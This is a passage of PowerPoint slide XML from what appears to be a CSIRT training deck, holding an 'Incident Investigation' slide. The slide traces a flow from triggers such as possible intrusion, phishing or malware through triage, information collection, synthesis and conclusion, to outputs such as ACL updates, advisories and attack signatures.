              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Arrow Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DE76E4-E866-9746-B14D-362D7DEF89AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="4498397"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="43" name="Straight Arrow Connector 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44B01985-F8C6-7B47-9B5B-2F41A70AF7FB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="5853113" y="5430259"/>
              <a:ext cx="547687" cy="7722"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100">
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle"/>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4"/>
            </a:lnRef>
            <a:fillRef idx="0">
              <a:schemeClr val="accent4"/>
            </a:fillRef>
            <a:effectRef idx="2">
              <a:schemeClr val="accent4"/>
            </a:effectRef>
            <a:fontRef idx="minor">
              <a:schemeClr val="tx1"/>
            </a:fontRef>
          </p:style>
        </p:cxnSp>
      </p:grpSp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="slow">
    <p:fade thruBlk="1"/>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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31F4D33E-8738-BE41-81EF-7E972A49EFDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="350838"/>
            <a:ext cx="8228013"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2pPr>
            <a:lvl3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90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2900" b="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Incident Investigation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21507" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{52236F3B-B151-C040-9C86-B8E0E661793A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="449263" y="1206500"/>
            <a:ext cx="8256587" cy="1579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215900" indent="-2159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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3pPr marL="647700" indent="-215900">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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5pPr>
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>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solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Droid Sans Fallback" charset="0"/>
                <a:cs typeface="Droid Sans Fallback" charset="0"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Response: core CSIRT activity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Not just incident reports from your constituency</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>suspicious behavior detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>new intelligence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:buSzPct val="45000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>vulnerabilities, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Right Arrow 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7EC1680-9242-254B-891E-9D118FB4F953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1979712" y="3279850"/>
            <a:ext cx="5112568" cy="792088"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="6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eaLnBrk="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Incident Investigation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19CA80E5-35CF-3647-BCD0-DF7511C768F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1835696" y="4098749"/>
            <a:ext cx="5439933" cy="1332000"/>
            <a:chOff x="2120219" y="4098749"/>
            <a:chExt cx="5439933" cy="1332000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Can 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CA850CD-DAF9-5F4B-BC64-7029A7A8B381}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="6084152" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="007417"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="TextBox 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6463A6-E3D8-594E-BD95-1BD42A77AC37}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6258583" y="4554123"/>
              <a:ext cx="1210588" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Conclusion</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Can 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70B6CD88-80D7-E743-B5C0-AFDBB676D3C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="4817734" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="009B17"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="TextBox 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73481266-47CC-7E48-BDAE-2DB1A67CFAC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5138069" y="4302237"/>
              <a:ext cx="1058175" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Synthesis</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&amp;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>fusion</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Can 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A6C8ED9-2B00-ED40-87E4-521D27E05246}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="3548071" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="53CB5C"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29FED9D2-6F6C-574F-B339-DA9C2355907E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3734494" y="4302237"/>
              <a:ext cx="1326004" cy="923330"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Collect</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>additional</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>information</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Can 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA5AA9A9-C36E-0E4B-8BD0-BE72C95198C2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="16200000">
              <a:off x="2264219" y="3954749"/>
              <a:ext cx="1332000" cy="1620000"/>
            </a:xfrm>
            <a:prstGeom prst="can">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="53CB5C"/>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en-GB" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="TextBox 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078D003F-5AE1-E747-8217-112C4335B442}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2661892" y="4579238"/>
              <a:ext cx="748730" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Triage</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{674ABC62-23F8-C248-8F83-4618C7F6BB36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="112177" y="4234338"/>
            <a:ext cx="1706685" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Possible intrusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Possible phishing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Malware detected</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DF14B41-6CC2-DF4B-8AB4-2A01C2A23A77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7341662" y="4102182"/>
            <a:ext cx="1667829" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ACL update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Advisory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attack signature</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Software upgrade</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
